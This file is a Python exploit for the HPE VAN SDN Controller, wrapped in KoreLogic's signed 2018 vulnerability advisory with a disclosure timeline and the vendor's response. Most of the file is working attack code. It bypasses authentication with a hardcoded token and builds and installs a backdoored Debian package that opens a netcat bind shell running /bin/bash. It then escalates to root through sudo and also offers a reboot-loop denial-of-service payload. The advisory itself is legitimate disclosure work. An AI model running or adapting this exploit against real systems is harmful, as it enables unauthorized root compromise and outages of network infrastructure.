401 lines
No EOL
19 KiB
Python
Executable file
401 lines
No EOL
19 KiB
Python
Executable file
'''
|
|
-----BEGIN PGP SIGNED MESSAGE-----
|
|
Hash: SHA256
|
|
|
|
KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability
|
|
|
|
Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability
|
|
Advisory ID: KL-001-2018-008
|
|
Publication Date: 2018.06.25
|
|
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt
|
|
|
|
|
|
1. Vulnerability Details
|
|
|
|
Affected Vendor: HP Enterprise
|
|
Affected Product: VAN SDN Controller
|
|
Affected Version: 2.7.18.0503
|
|
Platform: Embedded Linux
|
|
CWE Classification: CWE-798: Use of Hard-coded Credentials,
|
|
CWE-20: Improper Input Validation
|
|
Impact: Privilege Escalation
|
|
Attack vector: HTTP
|
|
|
|
2. Vulnerability Description
|
|
|
|
A hardcoded service token can be used to bypass
|
|
authentication. Built-in functionality can be exploited
|
|
to deploy and execute a malicious deb file containing a
|
|
backdoor. A weak sudoers configuration can then be abused to
|
|
escalate privileges to root. A second issue can be used to
|
|
deny use of the appliance by continually rebooting it.
|
|
|
|
3. Technical Description
|
|
|
|
The exploit will automatically attempt to bypass authentication
|
|
unless the --no-auth-bypass flag is provided. If that flag is
|
|
provided, the --username and --password flags must also be given.
|
|
|
|
The options for the --payload flag are: rce-root and
|
|
pulse-reboot. The default option is rce-root. The pulse-reboot
|
|
payload will reboot the target device until the attack is stopped.
|
|
|
|
$ python hpevansdn-multiple_exploits.py --help
|
|
HPE VAN SDN Controller 2.7.18.0503
|
|
Unauthenticated Remote Root and Denial-of-Service
|
|
|
|
Usage: hpevansdn-multiple_exploits.py [options]
|
|
|
|
Options:
|
|
-h, --help show this help message and exit
|
|
--target=REMOTE_IP Target IP address
|
|
--no-auth-bypass No authentication bypass
|
|
--username=USERNAME Username (Default: sdn)
|
|
--password=PASSWORD Password (Default: skyline)
|
|
--payload=PAYLOAD Payload: rce-root(default), pulse-reboot
|
|
|
|
Below is output for the rce-root payload:
|
|
|
|
$ python hpevansdn-multiple_exploits.py --target 1.3.3.7
|
|
HPE VAN SDN Controller 2.7.18.0503
|
|
Unauthenticated Remote Root and Denial-of-Service
|
|
|
|
[+] Authentication successfully bypassed.
|
|
[-] Starting remote root exploit.
|
|
[-] Building backdoor.
|
|
[-] Uploading backdoor.
|
|
[+] Upload successful.
|
|
[-] Installing backdoor.
|
|
[+] Starting backdoor on port 49370.
|
|
[+] Connected to backdoor.
|
|
* For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW
|
|
id
|
|
uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn)
|
|
/var/lib/sdn/uploads/root-V6mlQNqW
|
|
root@medium-hLinux:/opt/sdn/admin# uname -a
|
|
Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux
|
|
root@medium-hLinux:/opt/sdn/admin# exit
|
|
[-] Removing backdoor.
|
|
[+] Backdoor removed.
|
|
|
|
4. Mitigation and Remediation Recommendation
|
|
|
|
The vendor issued the following statement:
|
|
|
|
HPE had evaluated the impact of service token being
|
|
leaked and previously updated the security procedure in
|
|
VAN 2.8.8 Admin Guide page 129. The full guide is here -
|
|
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a00003662en_us-1.pdf.
|
|
|
|
HPE expects all customers to update their service token,
|
|
admin token, default sdn user password, and edit iptables as
|
|
described in the guideline. If the guideline was followed,
|
|
the exploit would not be successful.
|
|
|
|
5. Credit
|
|
|
|
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
|
of KoreLogic, Inc.
|
|
|
|
6. Disclosure Timeline
|
|
|
|
2018.02.16 - KoreLogic submits vulnerability details to HPE.
|
|
2018.02.16 - HPE acknowledges receipt.
|
|
2018.04.02 - 30 business days have elapsed since the vulnerability
|
|
was reported to HPE.
|
|
2018.04.23 - 45 business days have elapsed since the vulnerability
|
|
was reported to HPE.
|
|
2018.05.04 - KoreLogic requests an update on the status of the
|
|
remediation.
|
|
2018.05.14 - 60 business days have elapsed since the vulnerability
|
|
was reported to HPE.
|
|
2018.06.05 - 75 business days have elapsed since the vulnerability
|
|
was reported to HPE.
|
|
2018.06.11 - KoreLogic requests an update on the status of the
|
|
remediation.
|
|
2018.06.12 - HPE responds with the statement documented in Section
|
|
4. Mitigation and Remediation Recommendation.
|
|
2018.06.25 - KoreLogic public disclosure.
|
|
|
|
7. Proof of Concept
|
|
'''
|
|
|
|
from optparse import OptionParser
|
|
from random import randrange,choice
|
|
from threading import Thread
|
|
from os import mkdir,makedirs,system,listdir,remove
|
|
from string import ascii_letters,digits
|
|
from subprocess import check_output
|
|
from requests import get,post
|
|
from requests.utils import dict_from_cookiejar
|
|
from requests.exceptions import ConnectionError
|
|
from time import sleep
|
|
from sys import exit
|
|
from json import dumps
|
|
|
|
#################################
|
|
# PULSE REBOOT TIMER IN SECONDS #
|
|
pulse_timer = 60 #
|
|
#################################
|
|
|
|
banner = """HPE VAN SDN Controller 2.7.18.0503
|
|
Unauthenticated Remote Root and Denial-of-Service
|
|
""".center(80)
|
|
|
|
class Backdoor:
|
|
def __init__(self):
|
|
######################################################################################
|
|
# ATTACK SHELL SCRIPT #
|
|
self.backdoor_port = randrange(50000,55000) #
|
|
self.backdoor_script = """#!/bin/sh\nnc -l -p PORT -e /bin/bash &""" # DONT CHANGE #
|
|
self.backdoor_dir = '%s-1.0.0' % ''.join( #
|
|
[choice(digits + ascii_letters) for i in xrange(8)] #
|
|
) #
|
|
self.backdoor_script = self.backdoor_script.replace('PORT',str(self.backdoor_port)) #
|
|
######################################################################################
|
|
self.cmd_name = ''.join([choice(digits + ascii_letters) for i in xrange(8)])
|
|
return None
|
|
def generate(self):
|
|
print '[-] Building backdoor.'
|
|
control_template = """Source: %s
|
|
Section: misc
|
|
Priority: extra
|
|
Maintainer: None
|
|
Homepage: http://127.0.0.1/
|
|
Version: 1.0.0
|
|
Package: %s
|
|
Architecture: all
|
|
Depends:
|
|
Description: %s
|
|
""" % (self.backdoor_dir,self.cmd_name,self.backdoor_dir)
|
|
try:
|
|
mkdir(self.backdoor_dir)
|
|
mkdir('%s/%s' % (self.backdoor_dir,'DEBIAN'))
|
|
fp = open('%s/%s/control' % (self.backdoor_dir,'DEBIAN'),'w')
|
|
fp.write(control_template)
|
|
fp.close()
|
|
makedirs('%s/var/lib/sdn/uploads/tmp' % (self.backdoor_dir))
|
|
fp = open('%s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name),'w')
|
|
fp.write(self.backdoor_script)
|
|
fp.close()
|
|
fp = open('%s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name),'w')
|
|
fp.write("""#!/bin/sh\nsudo -u sdn /usr/bin/sudo python -c 'import pty;pty.spawn("/bin/bash")'""")
|
|
fp.close()
|
|
system('chmod a+x %s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name))
|
|
system('chmod a+x %s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name))
|
|
if "dpkg-deb: building package" not in check_output(
|
|
['/usr/bin/dpkg-deb', '--build', '%s/' % (self.backdoor_dir)]
|
|
):
|
|
print '[!] Could not build attack deb file. Reason: DPKG failure.'
|
|
except Exception as e:
|
|
print '[!] Could not build attack deb file. Reason: %s.' % (e)
|
|
return '%s.deb' % self.backdoor_dir,self.cmd_name,self.backdoor_port
|
|
|
|
class HTTP:
|
|
def __init__(self):
|
|
return None
|
|
def is_service_token_enabled(self):
|
|
url = 'https://%s:8443/sdn/ui/app/rs/hpws/config' % (self.target)
|
|
try:
|
|
r = get(url, headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent}, verify=False, allow_redirects=False)
|
|
if r.status_code == 200:
|
|
return True
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
return False
|
|
def get_session_token(self):
|
|
url = 'https://%s:8443/sdn/ui/app/login' % (self.target)
|
|
try:
|
|
r = post(url, headers={"User-Agent":self.user_agent},verify=False, data="username=%s&password=%s" % (self.username,self.password), allow_redirects=False)
|
|
if r.status_code == 303:
|
|
self.session_token = dict_from_cookiejar(r.cookies)['X-Auth-Token']
|
|
return True
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
return False
|
|
def upload_deb(self):
|
|
print '[-] Uploading backdoor.'
|
|
url = 'https://%s:8081/upload' % (self.target)
|
|
try:
|
|
fp = open('%s' % (self.deb_name),'rb')
|
|
data = fp.read()
|
|
fp.close()
|
|
try:
|
|
r = post(url,headers={"X-Auth-Token":self.session_token,"Filename":self.deb_name,"User-Agent":self.user_agent},verify=False,data=data)
|
|
if r.status_code == 200:
|
|
print '[+] Upload successful.'
|
|
return True
|
|
else:
|
|
print '[!] Upload failed. Please try again.'
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
except Exception as e:
|
|
print '[!] Failed to write backdoor to disk. Reason: %s.' % (e)
|
|
return False
|
|
def install_deb(self):
|
|
print '[-] Installing backdoor.'
|
|
url = 'https://%s:8081/' % (self.target)
|
|
post_body = dumps({"action":"install","name":self.deb_name})
|
|
try:
|
|
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
|
|
if r.status_code == 200:
|
|
return True
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
return False
|
|
def start_shell(self):
|
|
print '[+] Starting backdoor on port %d.' % (self.backdoor_port)
|
|
url = 'https://%s:8081/' % (self.target)
|
|
post_body = dumps({"action":"exec","name":self.cmd_name})
|
|
try:
|
|
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
|
|
if r.status_code == 200:
|
|
return True
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
return False
|
|
def uninstall_deb(self):
|
|
print '[-] Removing backdoor.'
|
|
url = 'https://%s:8081/' % (self.target)
|
|
post_body = dumps({"action":"uninstall","name":self.deb_name})
|
|
try:
|
|
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
|
|
if r.status_code == 200:
|
|
return True
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
return False
|
|
def send_reboot(self):
|
|
print '[+] Sending reboot.'
|
|
url = 'https://%s:8081/' % (self.target)
|
|
post_body = dumps({"action":"reboot"})
|
|
try:
|
|
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
|
|
except ConnectionError:
|
|
print '[!] Connection to target service failed.'
|
|
exit(1)
|
|
return False
|
|
|
|
class Exploit(HTTP):
|
|
def __init__(self,target=None,noauthbypass=None,
|
|
username=None,password=None,payload=None):
|
|
self.target = target
|
|
self.noauthbypass = noauthbypass
|
|
self.username = username
|
|
self.password = password
|
|
self.payload = payload
|
|
self.deb_name = ''
|
|
self.cmd_name = ''
|
|
self.backdoor_port = 0
|
|
self.session_token = 'AuroraSdnToken37'
|
|
self.user_agent = choice(['Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+',
|
|
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1',
|
|
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)',
|
|
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10'])
|
|
return None
|
|
def drop_root(self):
|
|
sleep(3)
|
|
print '[+] Connected to backdoor.\n\t* For interactive root shell please run /var/lib/sdn/uploads/root-%s' % (self.cmd_name)
|
|
system('nc %s %s' % (self.target,self.backdoor_port))
|
|
return False
|
|
def run(self):
|
|
if not self.is_service_token_enabled() or self.noauthbypass == True:
|
|
print '[-] Authentication bypass failed or running with --no-auth-bypass. Attempting login.'
|
|
if not self.get_session_token():
|
|
print '[!] Login failed. Exploit failed.'
|
|
exit(1)
|
|
else:
|
|
print '[+] Authentication successfully bypassed.'
|
|
if self.payload == 'rce-root':
|
|
print '[-] Starting remote root exploit.'
|
|
self.deb_name, self.cmd_name, self.backdoor_port = Backdoor().generate()
|
|
if self.upload_deb():
|
|
if self.install_deb():
|
|
Thread(target=self.start_shell,args=(),name="shell-%s" % (self.cmd_name)).start()
|
|
try:
|
|
self.drop_root()
|
|
except KeyboardInterrupt:
|
|
print '[-] Disconnecting from backdoor.'
|
|
return True
|
|
if self.uninstall_deb():
|
|
print '[+] Backdoor removed.'
|
|
else:
|
|
print '[!] Could not remove backdoor.'
|
|
return True
|
|
else:
|
|
print '[!] Failed to install backdoor.'
|
|
exit(1)
|
|
else:
|
|
print '[!] Failed to upload backdoor.'
|
|
exit(1)
|
|
print "[-] Please remember to srm %s and the build directory %s/" % (self.deb_name,self.deb_name.replace('.deb',''))
|
|
else:
|
|
print '[-] Starting pulse reboot exploit.'
|
|
while True:
|
|
try:
|
|
self.send_reboot()
|
|
sleep(pulse_timer)
|
|
except KeyboardInterrupt:
|
|
print '[-] Reboot pulse Denial-of-Service stopped.'
|
|
break
|
|
return False
|
|
|
|
if __name__=="__main__":
|
|
print banner
|
|
parser = OptionParser()
|
|
parser.add_option("--target",dest="remote_ip",default='',help="Target IP address")
|
|
parser.add_option("--no-auth-bypass",action="store_true",default=False,help="No authentication bypass")
|
|
parser.add_option("--username",dest="username",default="sdn",help="Username (Default: sdn)")
|
|
parser.add_option("--password",dest="password",default="skyline",help="Password (Default: skyline)")
|
|
parser.add_option("--payload",dest="payload",default='rce-root',help="Payload: rce-root(default), pulse-reboot")
|
|
o, a = parser.parse_args()
|
|
if o.remote_ip != '':
|
|
Exploit(target=o.remote_ip,
|
|
noauthbypass=o.no_auth_bypass,
|
|
username=o.username,
|
|
password=o.password,
|
|
payload=o.payload).run()
|
|
else:
|
|
print '[!] --target must be supplied.'
|
|
|
|
'''
|
|
The contents of this advisory are copyright(c) 2018
|
|
KoreLogic, Inc. and are licensed under a Creative Commons
|
|
Attribution Share-Alike 4.0 (United States) License:
|
|
http://creativecommons.org/licenses/by-sa/4.0/
|
|
|
|
KoreLogic, Inc. is a founder-owned and operated company with a
|
|
proven track record of providing security services to entities
|
|
ranging from Fortune 500 to small and mid-sized companies. We
|
|
are a highly skilled team of senior security consultants doing
|
|
by-hand security assessments for the most important networks in
|
|
the U.S. and around the world. We are also developers of various
|
|
tools and resources aimed at helping the security community.
|
|
https://korelogic.com/about-korelogic.html
|
|
|
|
Our public vulnerability disclosure policy is available at:
|
|
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
|
|
-----BEGIN PGP SIGNATURE-----
|
|
|
|
iQJOBAEBCAA4FiEETtzSIGy8wE6Vn0geUk0uR1lFz/MFAlsxL1caHGRpc2Nsb3N1
|
|
cmVzQGtvcmVsb2dpYy5jb20ACgkQUk0uR1lFz/OLgA/+I4R5zIz93rYS6VZBbMcD
|
|
6fQYup7o9yGkjSOyhTYMWJYL1BXMJHz534OUX54/vkvhoxdkhb4ouGIYneB+lXCb
|
|
WcPHGAkk094K50z9e3OXcsw3hDNS2lfQVS9IaHxR7iae4zRk6DQQYCBYgfPhi3+5
|
|
x9SkBV516WPM3iyu4Bgx19FTBcx3yXLRruGAftrceIiVdlUDrQbuu3Sht0oa3VBh
|
|
36mGDld7NS+vFHFJwTxbkBwodKViwDTzsYtnh0JId5ICp2a3PAR75Rwnbr+zt8SW
|
|
byD5CgA9szpSf7Sa6H8NnhGSKC47zXQ0K4uZsEJtkHqySjq0jvw1RngnIdJWnTFz
|
|
E6cEL7evsySeMKOoO1q8A0DpUigVFan3dxdaAE7uT9z2pN1RmRJglR8RiQo/L6ML
|
|
rKFhePlfsuqJon+Ux/R5XhKgT3oQbGwz/yaV1jSUujO+qqs0yI/pEIzhkj35Ovai
|
|
k9SiNQgIm8BvrIyA2nUI1xn32Pk2PFqh77gti5HVS3JExHsMPm5c3ZjKhw3/dS3d
|
|
wXeoeL7Vh+z2I0q9E2GzLSUqxh/vsYdlbcPprgH7GGsVElEhBprsw0AmNk7lh4e4
|
|
OwKI54tp0wbRewszQp8p9bbehwD+b4uFhqpD54w48yq3Ntv3/B07OprKWjEQUQC2
|
|
GKUgtPVRc8ZwJV+2c+MYICU=
|
|
=mzf4
|
|
-----END PGP SIGNATURE-----
|
|
''' |